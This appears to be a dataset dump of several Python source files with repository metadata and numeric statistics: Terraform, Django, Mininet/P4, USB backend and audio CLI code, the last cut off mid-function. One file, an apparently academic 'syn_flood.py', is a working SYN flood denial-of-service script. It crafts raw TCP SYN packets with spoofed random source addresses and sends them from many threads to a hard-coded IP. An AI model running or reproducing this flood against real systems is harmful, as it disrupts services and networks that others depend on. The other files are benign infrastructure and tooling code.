| 37.352941 | 85 | 0.733858 | 82 | 635 | 5.45122 | 0.390244 | 0.1566 | 0.147651 | 0.174497 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165354 | 635 | 16 | 86 | 39.6875 | 0.843396 | 0 | 0 | 0 | 0 | 0 | 0.111811 | 0.061417 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.153846 | 0 | 0.230769 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24747539fd8ac22a7c135fadd0de950c9f614794 | 1,060 | py | Python | examples/asg-only/stack.tf.py | steve-stonehouse/terraform-aws-asg-pipeline | 281a857a232cabb58cfaf6a302a96b1a27781cd6 | [
"MIT"
] | 1 | 2021-02-20T10:36:40.000Z | 2021-02-20T10:36:40.000Z | examples/asg-only/stack.tf.py | steve-stonehouse/terraform-aws-asg-pipeline | 281a857a232cabb58cfaf6a302a96b1a27781cd6 | [
"MIT"
] | 1 | 2021-05-13T13:58:13.000Z | 2021-05-13T13:58:13.000Z | examples/asg-only/stack.tf.py | steve-stonehouse/terraform-aws-asg-pipeline | 281a857a232cabb58cfaf6a302a96b1a27781cd6 | [
"MIT"
] | 4 | 2021-01-07T10:10:44.000Z | 2021-10-15T21:16:35.000Z | """
This file is used by Pretf to generate stack.tf.json.
The reason for using Pretf is that our AWS profiles have MFA prompts,
which is not supported by Terraform. We're using multiple AWS profiles
in these examples to manage resources in multiple AWS accounts, so we
can't use simple environment variables for AWS credentials. Pretf solves
this and also manages the S3 backend resources.
"""
from pretf.api import block
from pretf.aws import provider_aws, terraform_backend_s3
def pretf_blocks(var):
yield block("variable", "aws_region", {"default": "eu-west-1"})
yield block("variable", "aws_version", {"default": "3.1.0"})
yield block("variable", "terraform_version", {"default": "0.12.26"})
yield terraform_backend_s3(
bucket="terraform-aws-asg-codepipeline-tfstate",
dynamodb_table="terraform-aws-asg-codepipeline-tfstate",
key="asg-only.tfstate",
profile="claranetuk-thirdplaygroundRW",
region=var.aws_region,
)
yield block("terraform", {"required_version": var.terraform_version})
| 35.333333 | 73 | 0.726415 | 148 | 1,060 | 5.114865 | 0.547297 | 0.05284 | 0.071334 | 0.055482 | 0.089828 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013544 | 0.164151 | 1,060 | 29 | 74 | 36.551724 | 0.840858 | 0.364151 | 0 | 0 | 1 | 0 | 0.374436 | 0.156391 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
24777626ecc3432512182ddd00d3df2a0858c543 | 5,070 | py | Python | code/attacks/syn_flood.py | LTKills/TCC-Course-Conclusion-Thesis | 9f0f9f7796020e7d49d0b2e0ab76e20692e5f3a4 | [
"MIT"
] | null | null | null | code/attacks/syn_flood.py | LTKills/TCC-Course-Conclusion-Thesis | 9f0f9f7796020e7d49d0b2e0ab76e20692e5f3a4 | [
"MIT"
] | null | null | null | code/attacks/syn_flood.py | LTKills/TCC-Course-Conclusion-Thesis | 9f0f9f7796020e7d49d0b2e0ab76e20692e5f3a4 | [
"MIT"
] | null | null | null | # Developed by GABRIEL PEREIRA PINHEIRO and VICTOR ARAUJO VIEIRA
# In the University of Brasilia on 2017
# Atack SYN flood
#All copyrights to Gabriel Pereira Pinheiro and Victor Araujo Vieira
import socket, sys, random
from struct import *
from threading import Thread
import time
flag_encerra_threads = False
# checksum functions needed for calculation checksum
def checksum(msg):
s = 0
# loop taking 2 characters at a time
for i in range(0, len(msg), 2):
w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
s = s + w
s = (s>>16) + (s & 0xffff);
#s = s + (s >> 16);
#complement and mask to 4 byte short
s = ~s & 0xffff
return s
def menu():
x = input('Digite o numero de threads que serao ativadas ')
return x
def show_begin(ip_dest):
import time
print ('Iniciando o ataque ao roteador', ip_dest)
time.sleep(3)
def show_who(ip,numero):
print(' O servidor ',ip,'esta sendo atacado pela thread ',numero)
def attack(numero_thread, dest_ip):
#create a raw socket
#import time
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error , msg:
print('Socket could not be created. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
sys.exit()
# tell kernel not to put in headers, since we are providing it
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# now start constructing the packet
packet = '';
#atacando proprio roteador
#gera um ip de origem aleatorio, mas com os intervalos sempre de 2 a 254
#para evitar que sejam todos 255 ou tenha 0.0.0.0
#source_ip = '.'.join('%s'%random.randint(2, 254) for i in range(4))
#source_ip = '192...'
#dest_ip = '192...'
#show_who(dest_ip,numero_thread)
# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20 # python seems to correctly fill the total length, dont know how ??
id = 30 #Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10 # python seems to correctly fill the checksum
daddr = socket.inet_aton ( dest_ip )
ihl_version = (version << 4) + ihl
# tcp header fields
dest = 80 # destination port
seq = 0
ack_seq = 0
doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
fin = 0
syn = 1 #Setando a flag syn do pacote tcp
rst = 0
psh = 0
ack = 0
urg = 0
window = 5000
check = 0
urg_ptr = 0
offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) + (ack << 4) + (urg << 5)
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
while not flag_encerra_threads:
source_ip = '.'.join('%s'%random.randint(2, 254) for i in range(4))
print('source ip: ' + source_ip)
saddr = socket.inet_aton ( source_ip )
# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
#parte de gerar o pacote TCP, para cada nova porta gerada
source = random.randint(4000, 9000) # gera portas de origem aleatorias, entre os intervalos 4000 e 9000
# the ! in the pack format string means network order
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)
# pseudo header fields
source_address = socket.inet_aton( source_ip )
tcp_length = len(tcp_header)
psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);
psh = psh + tcp_header;
tcp_checksum = checksum(psh)
# make the tcp header again and fill the correct checksum
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum , urg_ptr)
# final full packet - syn packets dont have any data
packet = ip_header + tcp_header
s.sendto(packet, (dest_ip , 0 )) # put this in a loop if you want to flood the target
#contador = contador + 1
s.close() # encerra o socket
def count_time(max):
import time
begin = time.time()
duration = 0
while True:
time_until_now = time.time()
duration = time_until_now - begin
if duration > max:
print('\n\nSe passaram ',duration,' segundos\n\n')
begin = time.time()
ataque = []
def main():
qnt = menu()
#Put here the ip addres
dest_ip = '192.168.15.17' # ip que deseja atacar
for i in range(0, qnt):
ataque.append(Thread(target = attack, args = [i, dest_ip]))
show_begin(dest_ip)
for i in range (0, qnt):
ataque[i].setDaemon(True)
ataque[i].start()
while True:
time.sleep(40)
resp = raw_input('Deseja encerrar o ataque(0 ou 1)? ')
if(resp == '1'):
flag_encerra_threads = True
break
main()
| 28.644068 | 124 | 0.619132 | 745 | 5,070 | 4.107383 | 0.358389 | 0.017647 | 0.009804 | 0.017974 | 0.188235 | 0.156863 | 0.137909 | 0.096078 | 0.096078 | 0.069281 | 0 | 0.036672 | 0.27929 | 5,070 | 176 | 125 | 28.806818 | 0.800766 | 0.293294 | 0 | 0.107843 | 0 | 0 | 0.085311 | 0 | 0 | 0 | 0.00339 | 0.005682 | 0 | 0 | null | null | 0.009804 | 0.058824 | null | null | 0.04902 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2478ca648fedf246d69a5e00ab4529cc5ae395e3 | 282 | py | Python | shop/urls.py | ArRosid/ECommerceAPI | f683eed52e3591f6f45b955fb14f34154fa434ca | [
"MIT"
] | null | null | null | shop/urls.py | ArRosid/ECommerceAPI | f683eed52e3591f6f45b955fb14f34154fa434ca | [
"MIT"
] | null | null | null | shop/urls.py | ArRosid/ECommerceAPI | f683eed52e3591f6f45b955fb14f34154fa434ca | [
"MIT"
] | 1 | 2022-02-16T08:21:39.000Z | 2022-02-16T08:21:39.000Z | from django.urls import path, include
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register("category", views.CategoryViewSet)
router.register("product", views.ProductViewSet)
urlpatterns = [
path("", include(router.urls))
]
| 21.692308 | 50 | 0.769504 | 32 | 282 | 6.75 | 0.5625 | 0.101852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117021 | 282 | 12 | 51 | 23.5 | 0.86747 | 0 | 0 | 0 | 0 | 0 | 0.053381 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
247bb0fcb6c8c1435c8ad5d645cceffb1235621f | 9,965 | py | Python | mininet/p4_mininet.py | ghostli123/p4factory | 87ca095036d2023b52e42a8f1e2602f23f7adebe | [
"Apache-2.0"
] | 205 | 2015-04-08T13:35:19.000Z | 2022-03-28T09:22:47.000Z | mininet/p4_mininet.py | ghostli123/p4factory | 87ca095036d2023b52e42a8f1e2602f23f7adebe | [
"Apache-2.0"
] | 97 | 2015-04-16T00:41:05.000Z | 2022-01-26T22:08:34.000Z | mininet/p4_mininet.py | ghostli123/p4factory | 87ca095036d2023b52e42a8f1e2602f23f7adebe | [
"Apache-2.0"
] | 150 | 2015-04-02T18:49:15.000Z | 2022-02-10T23:16:26.000Z | # Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, subprocess, select, time, re, pty
from mininet.util import isShellBuiltin
from mininet.net import Mininet
from mininet.node import Switch, Host
from mininet.log import setLogLevel, info
class P4Host(Host):
def config(self, **params):
r = super(Host, self).config(**params)
self.defaultIntf().rename("eth0")
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload eth0 %s off" % off
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
def describe(self):
print "**********"
print self.name
print "default interface: %s\t%s\t%s" %(
self.defaultIntf().name,
self.defaultIntf().IP(),
self.defaultIntf().MAC()
)
print "**********"
class P4Switch(Switch):
"""P4 virtual switch"""
listenerPort = 11111
thriftPort = 22222
def __init__( self, name, sw_path = "dc_full",
thrift_port = None,
pcap_dump = False,
verbose = False, **kwargs ):
Switch.__init__( self, name, **kwargs )
self.sw_path = sw_path
self.verbose = verbose
logfile = '/tmp/p4ns.%s.log' % self.name
self.output = open(logfile, 'w')
self.thrift_port = thrift_port
self.pcap_dump = pcap_dump
@classmethod
def setup( cls ):
pass
def start( self, controllers ):
"Start up a new P4 switch"
print "Starting P4 switch", self.name
args = [self.sw_path]
args.extend( ['--name', self.name] )
args.extend( ['--dpid', self.dpid] )
for intf in self.intfs.values():
if not intf.IP():
args.extend( ['-i', intf.name] )
args.extend( ['--listener', '127.0.0.1:%d' % self.listenerPort] )
self.listenerPort += 1
# FIXME
if self.thrift_port:
thrift_port = self.thrift_port
else:
thrift_port = self.thriftPort
self.thriftPort += 1
args.extend( ['--pd-server', '127.0.0.1:%d' % thrift_port] )
if not self.pcap_dump:
args.append( '--no-cli' )
args.append( self.opts )
logfile = '/tmp/p4ns.%s.log' % self.name
print ' '.join(args)
self.cmd( ' '.join(args) + ' >' + logfile + ' 2>&1 </dev/null &' )
#self.cmd( ' '.join(args) + ' > /dev/null 2>&1 < /dev/null &' )
print "switch has been started"
def stop( self ):
"Terminate IVS switch."
self.output.flush()
self.cmd( 'kill %' + self.sw_path )
self.cmd( 'wait' )
self.deleteIntfs()
def attach( self, intf ):
"Connect a data port"
print "Connecting data port", intf, "to switch", self.name
self.cmd( 'p4ns-ctl', 'add-port', '--datapath', self.name, intf )
def detach( self, intf ):
"Disconnect a data port"
self.cmd( 'p4ns-ctl', 'del-port', '--datapath', self.name, intf )
def dpctl( self, *args ):
"Run dpctl command"
pass
# Based on code from
# http://techandtrains.com/2014/08/21/docker-container-as-mininet-host/
class P4DockerSwitch(Switch):
"""P4 virtual switch running in a docker conatiner"""
def __init__( self, name, target_name = 'p4dockerswitch',
thrift_port = None, target_dir = 'switch',
sai_port = None,
swapi_port = None,
pcap_dump = False,
verbose = False,
start_program = '/p4factory/tools/start.sh',
config_fs = None,
pps = 0,
qdepth = 0,
**kwargs ):
self.verbose = verbose
self.pcap_dump = pcap_dump
self.start_program = start_program
self.config_fs = config_fs
self.target_name = target_name
self.target_dir = target_dir
self.thrift_port = thrift_port
self.sai_port = sai_port
self.swapi_port = swapi_port
self.pps = pps
self.qdepth = qdepth
Switch.__init__( self, name, **kwargs )
self.inNamespace = True
@classmethod
def setup( cls ):
pass
def sendCmd( self, *args, **kwargs ):
assert not self.waiting
printPid = kwargs.get( 'printPid', True )
# Allow sendCmd( [ list ] )
if len( args ) == 1 and type( args[ 0 ] ) is list:
cmd = args[ 0 ]
# Allow sendCmd( cmd, arg1, arg2... )
elif len( args ) > 0:
cmd = args
# Convert to string
if not isinstance( cmd, str ):
cmd = ' '.join( [ str( c ) for c in cmd ] )
if not re.search( r'\w', cmd ):
# Replace empty commands with something harmless
cmd = 'echo -n'
self.lastCmd = cmd
printPid = printPid and not isShellBuiltin( cmd )
if len( cmd ) > 0 and cmd[ -1 ] == '&':
# print ^A{pid}\n{sentinel}
cmd += ' printf "\\001%d\\012" $! '
else:
pass
self.write( cmd + '\n' )
self.lastPid = None
self.waiting = True
def popen( self, *args, **kwargs ):
mncmd = [ 'docker', 'exec', "mininet-"+self.name ]
return Switch.popen( self, *args, mncmd=mncmd, **kwargs )
def stop( self ):
dev_null = open(os.devnull, 'w')
subprocess.call( ['docker stop mininet-' + self.name],
stdin=dev_null, stdout=dev_null,
stderr=dev_null, shell=True )
subprocess.call( ['docker rm mininet-' + self.name],
stdin=dev_null, stdout=dev_null,
stderr=dev_null, shell=True )
dev_null.close()
def terminate( self ):
self.stop()
def start( self, controllers ):
print "Starting P4 docker switch", self.name
path = '/p4factory/targets/switch/behavioral-model'
args = [ 'echo \"' + path ]
args.extend( ['--name', self.name] )
args.extend( ['--dpid', self.dpid] )
args.extend( ['--pd-server', '127.0.0.1:22000'] )
if not self.pcap_dump:
args.append( '--no-pcap' )
for intf in self.intfs.values():
if not intf.IP():
args.extend( ['-i', intf.name] )
args.extend( ['--pps', self.pps] )
args.extend( ['--qdepth', self.qdepth] )
# Enable it for verbose logs from model
#args.append( '-t' )
args.append( '--no-veth' )
args.append( '>& /tmp/model.log &' )
args.append( '\" >> /p4factory/tools/bm_start.sh' )
self.cmd( args )
bm_cmd = ['docker', 'exec', 'mininet-' + self.name,
'/p4factory/tools/bm_start.sh' ]
bmp = subprocess.Popen( bm_cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=False )
bmp.wait()
def startShell( self ):
self.stop()
docker_name = self.target_name
args = ['docker', 'run', '-ti', '--rm', '--privileged=true']
args.extend( ['--hostname=' + self.name, '--name=mininet-' + self.name] )
if self.thrift_port is not None:
args.extend( ['-p', '%d:22000' % self.thrift_port] )
if self.sai_port is not None:
args.extend( ['-p', '%d:9092' % self.sai_port] )
if self.swapi_port is not None:
args.extend( ['-p', '%d:9091' % self.swapi_port] )
args.extend( ['-e', 'DISPLAY'] )
args.extend( ['-v', '/tmp/.X11-unix:/tmp/.X11-unix'] )
if self.config_fs is not None:
args.extend( ['-v',
os.getcwd() + '/' + self.config_fs + ':/configs'] )
args.extend( [docker_name, self.start_program] )
master, slave = pty.openpty()
self.shell = subprocess.Popen( args,
stdin=slave, stdout=slave, stderr=slave,
close_fds=True,
preexec_fn=os.setpgrp )
os.close( slave )
ttyobj = os.fdopen( master, 'rw' )
self.stdin = ttyobj
self.stdout = ttyobj
self.pid = self.shell.pid
self.pollOut = select.poll()
self.pollOut.register( self.stdout )
self.outToNode[ self.stdout.fileno() ] = self
self.inToNode[ self.stdin.fileno() ] = self
self.execed = False
self.lastCmd = None
self.lastPid = None
self.readbuf = ''
self.waiting = False
#Wait for prompt
time.sleep(1)
pid_cmd = ['docker', 'inspect', '--format=\'{{ .State.Pid }}\'',
'mininet-' + self.name ]
pidp = subprocess.Popen( pid_cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=False )
pidp.wait()
ps_out = pidp.stdout.readlines()
self.pid = int(ps_out[0])
self.cmd( 'export PS1=\"\\177\"; printf "\\177"' )
self.cmd( 'stty -echo; set +m' )
| 35.845324 | 81 | 0.535575 | 1,175 | 9,965 | 4.462128 | 0.278298 | 0.032043 | 0.016021 | 0.009918 | 0.250048 | 0.219722 | 0.171657 | 0.144383 | 0.109861 | 0.109861 | 0 | 0.018814 | 0.327948 | 9,965 | 277 | 82 | 35.974729 | 0.764073 | 0.096839 | 0 | 0.24186 | 0 | 0 | 0.135551 | 0.028212 | 0 | 0 | 0 | 0.00361 | 0.004651 | 0 | null | null | 0.018605 | 0.023256 | null | null | 0.060465 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2484641686c9e401e0c6f1d4e5155e7bdadc8ed6 | 406 | py | Python | stats-backend/collector/migrations/0024_node_benchmarked_at.py | cryptobench/golem-stats-backend | 567e98873bff6282415ecbdc075c27dab75d805a | [
"MIT"
] | null | null | null | stats-backend/collector/migrations/0024_node_benchmarked_at.py | cryptobench/golem-stats-backend | 567e98873bff6282415ecbdc075c27dab75d805a | [
"MIT"
] | 4 | 2021-03-28T16:42:41.000Z | 2022-01-01T14:48:46.000Z | stats-backend/collector/migrations/0024_node_benchmarked_at.py | golemfactory/golem-stats-backend | 95467749a13e4496032150cf08a9a3686ef213d3 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.8 on 2021-10-13 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('collector', '0023_node_benchmark_score'),
]
operations = [
migrations.AddField(
model_name='node',
name='benchmarked_at',
field=models.DateTimeField(blank=True, null=True),
),
]
| 21.368421 | 62 | 0.610837 | 44 | 406 | 5.522727 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064626 | 0.275862 | 406 | 18 | 63 | 22.555556 | 0.761905 | 0.110837 | 0 | 0 | 1 | 0 | 0.144847 | 0.069638 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
248630c333547d480ed84c90947e296fc0fc3449 | 8,662 | py | Python | joulescope/usb/api.py | tadodotcom/pyjoulescope | ab9645a2774cf5d5355dee4c1e60a566419b0e00 | [
"Apache-2.0"
] | 29 | 2018-12-19T22:42:09.000Z | 2022-01-31T12:26:52.000Z | joulescope/usb/api.py | tadodotcom/pyjoulescope | ab9645a2774cf5d5355dee4c1e60a566419b0e00 | [
"Apache-2.0"
] | 23 | 2019-07-21T23:44:46.000Z | 2022-03-11T13:29:11.000Z | joulescope/usb/api.py | tadodotcom/pyjoulescope | ab9645a2774cf5d5355dee4c1e60a566419b0e00 | [
"Apache-2.0"
] | 9 | 2019-07-22T00:07:53.000Z | 2021-11-26T11:46:19.000Z | # Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The USB backend which must be implemented for each platform type.
This module defines the USB backend. Each target platform
(such as Windows, Mac OS/X and Linux), must implement backend that conforms
to this API.
This API is **not** thread-safe. All methods and functions must be invoked
from a single thread.
"""
class DeviceEvent:
ENDPOINT_CALLBACK_STOP = -1 # a callback indicated that streaming should stop
UNDEFINED = 0
COMMUNICATION_ERROR = 1 # an communicate error that prevents this device from functioning, such as device removal
ENDPOINT_CALLBACK_EXCEPTION = 2 # a callback threw an exception
class DeviceDriverApi:
"""The device driver API.
This API is **not** thread-safe. All methods must be invoked from a
single thread.
"""
def __str__(self):
"""Get the user-friendly device string.
:return: f'{product_id_str}:{serial_number_str}'
:raise IOError: On failure.
WARNING: This function must correctly identify the device BEFORE it
is opened. Therefore, it must only use the information available
from USB enumeration.
"""
raise NotImplementedError()
@property
def serial_number(self):
"""Get the assigned serial number.
:return: The serial number string.
This attribute is valid even before the device is opened.
"""
raise NotImplementedError()
def open(self, event_callback_fn):
"""Open the USB device.
:param event_callback_fn: The function(event, message) to call on
asynchronous events, mostly to allow robust handling of device
errors. "event" is one of the :class:`DeviceEvent` values,
and the message is a more detailed description of the event.
:raise IOError: On failure.
The event_callback_fn may be called asynchronous and from other
threads. The event_callback_fn must implement any thread safety.
"""
raise NotImplementedError()
def close(self):
"""Close the USB device."""
raise NotImplementedError()
def control_transfer_out(self, cbk_fn, recipient, type_, request, value=0, index=0, data=None) -> bool:
"""Perform a control transfer with data from host to device.
:param cbk_fn: The function called with the class:`ControlTransferResponse` result.
This method guarantees that cbk_fn will always be called.
cbk_fn may be called BEFORE exiting this method call.
:param recipient: The recipient which is one of ['device', 'interface', 'endpoint', 'other']
:param type_: The type which is one of ['standard', 'class', 'vendor'].
:param request: The bRequest value.
:param value: The wValue value.
:param index: The wIndex value.
:param data: The optional data to transfer from host to device.
None (default) skips the data phase.
:return: True on pending, False on error.
"""
raise NotImplementedError()
def control_transfer_in(self, cbk_fn, recipient, type_, request, value, index, length) -> bool:
"""Perform a control transfer with data from device to host.
:param cbk_fn: The function called with the class:`ControlTransferResponse` result.
This method guarantees that cbk_fn will always be called.
cbk_fn may be called BEFORE exiting this method call.
:param recipient: The recipient which is one of ['device', 'interface', 'endpoint', 'other']
:param type_: The type which is one of ['standard', 'class', 'vendor'].
:param request: The bRequest value.
:param value: The wValue value.
:param index: The wIndex value.
:param length: The maximum number of bytes to transfer from device to host.
:return: True on pending, False on error.
"""
raise NotImplementedError()
def read_stream_start(self, endpoint_id, transfers, block_size, data_fn, process_fn, stop_fn):
"""Read a stream of data using non-blocking (overlapped) IO.
:param endpoint_id: The target endpoint address.
:param transfers: The number of overlapped transfers to use,
each of block_size bytes.
:param block_size: The length of each block in bytes which must be
a multiple of the maximum packet size for the endpoint.
:param data_fn: The function(data) to call on each block
of data. The data is an np.ndarray(dtype=uint8) containing
the raw bytes received for each USB transaction.
The length of data is normally block_size.
Any value less than block_size is the last transfer
in the transaction.
When the device stops, it calls data_fn(None). The
device can stop "automatically" through errors or when data_fn
returns True. Call :meth:`read_stream_stop` to stop from
the caller.
This function will be called from the device's thread. The
data_fn must return quickly to ensure that the USB stream
is not starved.
In all cases, data_fn should return None or False to continue
streaming. data_fn can return True to stop the transmission.
Most implementations use some form of non-blocking IO with
multiple queue (overlapped) transactions that are pended
early. On stop, additional data may be read before the
transaction fully stops.
:param process_fn: The function process_fn() to call after all
USB endpoints have been recently serviced and data_fn was
called at least once. The function should still be quick,
but it can have more latency than data_fn.
:param stop_fn: The function(event, message) called when this endpoint
stops streaming data. See :class:`DeviceEvent` for allowed event
values.
Use :meth:`read_stream_stop` to stop.
"""
raise NotImplementedError()
def read_stream_stop(self, endpoint_id):
"""Stop a read stream.
:param endpoint_id: The target endpoint address.
When stop is complete, the data_fn provided to read_stream_start will
be called with None.
Use :meth:`read_stream_start` to start.
"""
raise NotImplementedError()
def status(self):
"""Get the current device status.
:return: A dict containing the following structure:
endpoints: {
pipe_id: { name: {value: v, units: u}, ...}
...
}
"""
raise NotImplementedError()
def signal(self):
"""Signal that an external event occurred.
This method allows another thread to cause the wait in process
to activate.
"""
raise NotImplementedError()
def process(self, timeout=None):
"""Process any pending events.
:param timeout: The timeout in float seconds.
This method uses the operating-system specific method to wait on
pending events, such select and WaitForMultipleObjects.
"""
raise NotImplementedError()
class DeviceNotify:
def __init__(self, cbk):
"""Start device insertion/removal notification.
:param cbk: The function called on device insertion or removal. The
arguments are (inserted, info). "inserted" is True on insertion
and False on removal. "info" contains platform-specific details
about the device. In general, the application should rescan for
relevant devices.
"""
pass
def close(self):
"""Close and stop the notifications."""
raise NotImplementedError()
def scan(name: str=None):
"""Scan for attached devices.
:param name: The case-insensitive name of the device to scan.
:return: The list of attached backend :class:`Device` instances.
"""
raise NotImplementedError()
| 38.497778 | 118 | 0.659317 | 1,122 | 8,662 | 5.019608 | 0.290553 | 0.055398 | 0.04794 | 0.008523 | 0.244318 | 0.216974 | 0.208452 | 0.171875 | 0.158026 | 0.145597 | 0 | 0.002387 | 0.274648 | 8,662 | 224 | 119 | 38.669643 | 0.894 | 0.726622 | 0 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.388889 | false | 0.027778 | 0 | 0 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
248b58cb4625736f2cb0396f27150679a31d86b4 | 3,155 | py | Python | tomomibot/commands/status.py | adzialocha/tomomibot | ed3964223bd63340f28d36daa014865f61aaf571 | [
"MIT"
] | 28 | 2018-07-26T09:47:32.000Z | 2022-01-24T10:38:13.000Z | tomomibot/commands/status.py | adzialocha/tomomibot | ed3964223bd63340f28d36daa014865f61aaf571 | [
"MIT"
] | null | null | null | tomomibot/commands/status.py | adzialocha/tomomibot | ed3964223bd63340f28d36daa014865f61aaf571 | [
"MIT"
] | 5 | 2018-08-11T08:07:23.000Z | 2021-12-23T14:47:40.000Z | import os
import click
from tomomibot.audio import all_inputs, all_outputs
from tomomibot.cli import pass_context
from tomomibot.const import GENERATED_FOLDER, MODELS_FOLDER
from tomomibot.utils import line, check_valid_voice, check_valid_model
def list_audio_channels(ctx, channels):
ctx.log(line())
ctx.log('{0:2} {1:8} {2:30}'.format(' #', 'Channels', 'Name'))
ctx.log(line())
for i, chn in enumerate(channels):
ctx.log('{0:2} {1:8} {2:30}'.format(
i,
chn.channels,
chn.name[:30]))
def list_voices(ctx):
ctx.log(line())
ctx.log('{0:2} {1:20} {2:10} {3:10}'.format(
' #', 'Name', 'Status', 'Version'))
ctx.log(line())
voice_dir = os.path.join(os.getcwd(), GENERATED_FOLDER)
for i, entry in enumerate(os.scandir(voice_dir)):
if entry.is_dir():
try:
version = check_valid_voice(entry.name)
except FileNotFoundError:
status = click.style('✘', fg='red')
else:
status = click.style('✓', fg='green')
ctx.log('{0:2} {1:20} {2:10} {3:10}'.format(
i,
entry.name[:30],
status,
version or '?'))
def list_models(ctx):
ctx.log(line())
ctx.log('{0:2} {1:30} {2:10}'.format(' #', 'Name', 'Status'))
ctx.log(line())
model_dir = os.path.join(os.getcwd(), MODELS_FOLDER)
for i, entry in enumerate(os.scandir(model_dir)):
if entry.is_file():
try:
check_valid_model(entry.name.split('.')[0])
except FileNotFoundError:
status = click.style('✘', fg='red')
else:
status = click.style('✓', fg='green')
